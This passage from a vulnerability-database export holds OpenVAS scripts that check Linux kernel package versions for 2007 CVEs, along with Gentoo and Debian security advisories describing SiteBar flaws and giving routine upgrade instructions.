script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks 
GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", 
rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:48", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870177", "id": "OPENVAS:1361412562310870177", "title": "RedHat Update for kernel RHSA-2007:1104-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2007:1104-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. 
This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2007-December/msg00018.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870177\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2007:1104-01\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"RedHat Update for kernel RHSA-2007:1104-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release 
== NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:38", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2007-0993", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122628", "title": "Oracle Linux Local Check: ELSA-2007-0993", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2007-0993.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122628\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:49:43 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2007-0993\");\n script_tag(name:\"insight\", value:\"ELSA-2007-0993 - Important: kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2007-0993\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2007-0993.html\");\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", 
rpm:\"kernel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:37", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870182", "id": "OPENVAS:1361412562310870182", "type": "openvas", "title": "RedHat Update for kernel RHSA-2007:0993-01", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2007:0993-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel handles the basic functions of the operating system.\n\n These new kernel packages contain fixes for the following security issues:\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch. A\n local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n A flaw was found in the handling of IEEE 802.11 frames affecting several\n wireless LAN modules. In certain circumstances, a remote attacker could\n trigger this flaw by sending a malicious packet over a wireless network and\n cause a denial of service (kernel crash). (CVE-2007-4997, Important). \n \n A flaw was found in the Advanced Linux Sound Architecture (ALSA). A local\n user who had the ability to read the /proc/driver/snd-page-alloc file could\n see portions of kernel memory. (CVE-2007-4571, Moderate). 
\n \n In addition to the security issues described above, several bug fixes\n preventing possible memory corruption, system crashes, SCSI I/O fails,\n networking drivers performance regression and journaling block device layer\n issue were also included.\n \n Red Hat Enterprise Linux 5 users are advised to upgrade to these packages,\n which contain backported patches to resolve these issues.\n \n Red Hat would like to credit Vasily Averin, Chris Evans, and Neil Kettle \n for reporting the security issues corrected by this update.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2007-November/msg00001.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870182\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2007:0993-01\");\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"RedHat Update for kernel RHSA-2007:0993-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:58", "bulletinFamily": "unix", "description": "### Background\n\nSiteBar is a PHP application that allows users to store their bookmarks on a web server. \n\n### Description\n\nTim Brown discovered these multiple issues: the translation module does not properly sanitize the value to the \"dir\" parameter (CVE-2007-5491, CVE-2007-5694); the translation module also does not sanitize the values of the \"edit\" and \"value\" parameters which it passes to eval() and include() (CVE-2007-5492, CVE-2007-5693); the log-in command does not validate the URL to redirect users to after logging in (CVE-2007-5695); SiteBar also contains several cross-site scripting vulnerabilities (CVE-2007-5692). 
\n\n### Impact\n\nAn authenticated attacker in the \"Translators\" or \"Admins\" group could execute arbitrary code, read arbitrary files and possibly change their permissions with the privileges of the user running the web server by passing a specially crafted parameter string to the \"translator.php\" file. An unauthenticated attacker could entice a user to browse a specially crafted URL, allowing for the execution of script code in the context of the user's browser, for the theft of browser credentials or for a redirection to an arbitrary web site after login. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll SiteBar users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/sitebar-3.3.9\"", "modified": "2007-11-06T00:00:00", "published": "2007-11-06T00:00:00", "id": "GLSA-200711-05", "href": "https://security.gentoo.org/glsa/200711-05", "type": "gentoo", "title": "SiteBar: Multiple issues", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:30", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1423-1 security@debian.org\nhttp://www.debian.org/security/ Steve Kemp\nDecember 07, 2007 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : sitebar\nVulnerability : various\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2007-5491, CVE-2007-5492, CVE-2007-5693, CVE-2007-5694, CVE-2007-5695, CVE-2007-5692\nDebian Bug : 447135, 448690, 448689\n\nSeveral remote vulnerabilities have been discovered in sitebar, a\nweb based bookmark manager written in PHP. 
The Common Vulnerabilities\nExposures project identifies the following problems:\n\nCVE-2007-5491\n A directory traversal vulnerability in the translation module allows\n remote authenticated users to chmod arbitrary files to 0777 via ".."\n sequences in the lang parameter.\n\nCVE-2007-5492\n A static code injection vulnerability in the translation module allows\n a remote authenticated user to execute arbitrary PHP code via the value\n parameter.\n\nCVE-2007-5693\n An eval injection vulnerability in the translation module allows\n remote authenticated users to execute arbitrary PHP code via the\n edit parameter in an upd cmd action.\n\nCVE-2007-5694\n A path traversal vulnerability in the translation module allows\n remote authenticated users to read arbitrary files via an absolute\n path in the 'dir' parameter.\n\nCVE-2007-5695\n An error in command.php allows remote attackers to redirect users\n to arbitrary web sites via the forward parameter in a Log In action.\n\nCVE-2007-5692\n Multiple cross site scripting flaws allow remote attackers to inject\n arbitrary script or HTML fragments into several scripts.\n\n\nFor the stable distribution (etch), these problem have been fixed in version\n3.3.8-7etch1.\n\nFor the old stable distribution (sarge), these problems have been fixed in\nversion 3.2.6-7.1sarge1\n\nFor the unstable distribution (sid), these problems have been fixed in version\n3.3.8-12.1.\n\nWe recommend that you upgrade your sitebar package.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- 
--------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1sarge1.diff.gz\n Size/MD5 checksum: 12821 c38ed9e586c8b07b23349588f2be23b2\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6.orig.tar.gz\n Size/MD5 checksum: 333352 a86243f7a70a1a9ac80342fbcca14297\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1sarge1.dsc\n Size/MD5 checksum: 580 7654849ce1ea822b9b70c52a98def837\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1sarge1_all.deb\n Size/MD5 checksum: 341570 6e106cf5dddb0ee63f29efdcf93d8d74\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8-7etch1.dsc\n Size/MD5 checksum: 583 8af7750ff9a808798bf1b898c69b84d6\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8-7etch1.diff.gz\n Size/MD5 checksum: 22552 cdc186193c2ad2d4e69f220dd8372ccd\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8.orig.tar.gz\n Size/MD5 checksum: 686944 fa7b5367808966c8db6241f475f3ef2f\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8-7etch1_all.deb\n Size/MD5 checksum: 709524 16eb8791acea7cf1c99ac61b7b47e4b1\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": 
"2007-12-07T00:00:00", "published": "2007-12-07T00:00:00", "id": "DEBIAN:DSA-1423-1:8E33C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00204.html", "title": "[SECURITY] [DSA 1423-1] New sitebar packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-10-20T00:00:00", "published": "2007-10-20T00:00:00", "id": "SECURITYVULNS:VULN:8277", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8277", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "All,\r\n\r\nAs a result of a short security audit of SiteBar, a number of security holes \r\nwere found. The holes included code 